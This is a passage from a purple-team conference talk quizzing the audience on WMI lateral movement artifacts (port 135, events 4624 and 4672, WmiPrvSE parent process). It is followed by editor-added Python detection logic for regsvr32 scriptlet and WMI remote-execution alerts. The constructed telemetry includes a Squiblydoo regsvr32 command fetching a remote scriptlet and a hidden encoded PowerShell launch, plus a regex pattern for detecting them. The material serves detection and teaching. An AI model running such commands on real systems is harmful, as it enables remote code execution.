out there right now. And so I just think it's very, very valuable and still pretty much underutilized in most organizations currently. So that is all I have for you. So I have a couple more things of swag to give away, if you'll give me another two minutes. I just wanted to walk through another couple of examples, I'll give some people a chance to Google again or maybe redeem themselves as we ask a few questions here. So I'll try and keep these easy. So who likes lateral movement? Yeah, everybody likes lateral movement, right? How about WMI lateral movement? Okay, so if we use WMI to move laterally to another endpoint, what port is that going to initiate with on that distant

endpoint? Corner over there, nope, nope, nah, nope, not 389, not good. Do you think you're all kind of close? She knows. Okay, who said 135 first? Alright, there you are, I have a USB pen for you here in the front. Alright, so let's just walk through this. I probably have admin rights if I'm utilizing, or able to use, WMI to move laterally across the environment. So then what Windows event ID would I expect to see for a successful admin logon on that endpoint? No, so that would be a successful logon. No, I mean, you can Google it like I said, admin logon. 4624 is a successful logon event. 4672? Perfect, I have a USB fan for you. Alright, so I'll

go ahead and end it on this last question, for a nice little notebook. What would you expect the parent process to be on that endpoint whenever it spawns that process, call create command, or that built-in PowerShell WMI CIM, and say I spawn calc using WMI on that distant endpoint, what's gonna be the parent process? No, it starts with WMI, I'll give you that. Nope, not WMIC. WMIC could be used to initiate this command, but what's it gonna look like on the distant endpoint? Who just said that? WmiPrvSE, which is WMI provisioning. So just, I like going through these examples because, kind of, when you work through things you learn

as a purple teamer, right? And you get to see these techniques happen in the wild, you get to record all those events, and you get to hopefully kind of keep this as knowledge, or Google it like everyone else does. So thank you guys very much, I appreciate you coming out to my talk, hope you liked it.
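The two triage walkthroughs from the talk, the regsvr32 scriptlet alert (pivot from the command line to what the scriptlet spawned next) and the WMI lateral movement quiz (a 4624 network logon and 4672 special-privileges event on the target, then a child of WmiPrvSE.exe), written as detection logic over constructed telemetry. This is editor-added code, not the speaker's, and the events are constructed: Security log 4624/4672 records and Sysmon-style process creation events (event ID 1) carrying a parent image and the logon ID of the session. The IP addresses, PIDs, logon IDs, usernames, the scriptlet URL and the encoded PowerShell argument are all made up; the regsvr32 command line is the public Squiblydoo form the speaker refers to.

```python
"""Triage logic for regsvr32 scriptlet execution and WMI lateral movement,
run over constructed endpoint telemetry (added example, not the talk's code)."""
import re
from datetime import datetime, timedelta

# Constructed telemetry: Security log 4624/4672 plus Sysmon-style process
# creation (id 1) with parent lineage and the logon ID of the session.
EVENTS = [
    # Remote admin logon over the network (type 3) from 10.0.0.5 ...
    {"ts": "2018-11-01T10:00:00", "id": 4624, "logon_type": 3,
     "user": "CORP\\svc-admin", "logon_id": "0x3e7a1", "src_ip": "10.0.0.5"},
    {"ts": "2018-11-01T10:00:00", "id": 4672, "user": "CORP\\svc-admin",
     "logon_id": "0x3e7a1"},
    # ... followed by WMI Provider Host spawning calc in that session.
    {"ts": "2018-11-01T10:00:02", "id": 1, "pid": 4412, "ppid": 1188,
     "image": "C:\\Windows\\System32\\calc.exe", "cmdline": "calc.exe",
     "parent_image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "logon_id": "0x3e7a1"},
    # Benign: interactive logon (type 2), Explorer launches calc.
    {"ts": "2018-11-01T10:05:00", "id": 4624, "logon_type": 2,
     "user": "CORP\\jdoe", "logon_id": "0x5c01", "src_ip": "-"},
    {"ts": "2018-11-01T10:06:00", "id": 1, "pid": 5000, "ppid": 2000,
     "image": "C:\\Windows\\System32\\calc.exe", "cmdline": "calc.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "logon_id": "0x5c01"},
    # Squiblydoo: regsvr32 pulls a remote .sct and then spawns PowerShell.
    {"ts": "2018-11-01T10:07:00", "id": 1, "pid": 6100, "ppid": 2000,
     "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.10/t.sct scrobj.dll",
     "parent_image": "C:\\Windows\\explorer.exe", "logon_id": "0x5c01"},
    {"ts": "2018-11-01T10:07:01", "id": 1, "pid": 6120, "ppid": 6100,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA",
     "parent_image": "C:\\Windows\\System32\\regsvr32.exe", "logon_id": "0x5c01"},
]

# Squiblydoo shape: regsvr32 with a /i: scriptlet argument and scrobj.dll.
SCRIPTLET_RE = re.compile(r"regsvr32(?:\.exe)?\s.*?/i:(?P<url>\S+).*?scrobj\.dll", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def descendants(events, pid):
    """Depth-first process lineage below `pid` using the ppid links."""
    out = []
    for e in events:
        if e["id"] == 1 and e["ppid"] == pid:
            out.append(e["pid"])
            out.extend(descendants(events, e["pid"]))
    return out


def detect_regsvr32_scriptlet(events):
    """Alert on the command line, then pivot: where did the scriptlet come
    from, and what did regsvr32 spawn afterwards?"""
    findings = []
    for e in events:
        if e["id"] != 1:
            continue
        m = SCRIPTLET_RE.search(e["cmdline"])
        if m:
            findings.append({"pid": e["pid"], "url": m.group("url"),
                             "children": descendants(events, e["pid"])})
    return findings


def detect_wmi_remote_exec(events, window=timedelta(seconds=60)):
    """Flag children of WmiPrvSE.exe and tie each to the network logon (4624
    type 3) and admin marker (4672) that share its logon ID within `window`."""
    findings = []
    for proc in events:
        if proc["id"] != 1 or _basename(proc["parent_image"]) != "wmiprvse.exe":
            continue
        t0 = _ts(proc)
        logons = [e for e in events
                  if e["id"] == 4624 and e["logon_id"] == proc["logon_id"]
                  and e["logon_type"] == 3 and t0 - window <= _ts(e) <= t0]
        admin = any(e["id"] == 4672 and e["logon_id"] == proc["logon_id"]
                    for e in events)
        findings.append({"pid": proc["pid"], "image": _basename(proc["image"]),
                         "user": logons[0]["user"] if logons else None,
                         "src_ip": logons[0]["src_ip"] if logons else None,
                         "admin": admin})
    return findings


if __name__ == "__main__":
    print(detect_regsvr32_scriptlet(EVENTS))
    print(detect_wmi_remote_exec(EVENTS))
```

The lineage pivot is what the speaker is after: the regsvr32 alert alone only says a scriptlet ran, but walking the children shows the PowerShell it launched, and for the WMI case the logon ID is what ties the spawned process back to the remote session and its source address rather than to whoever was sitting at the console.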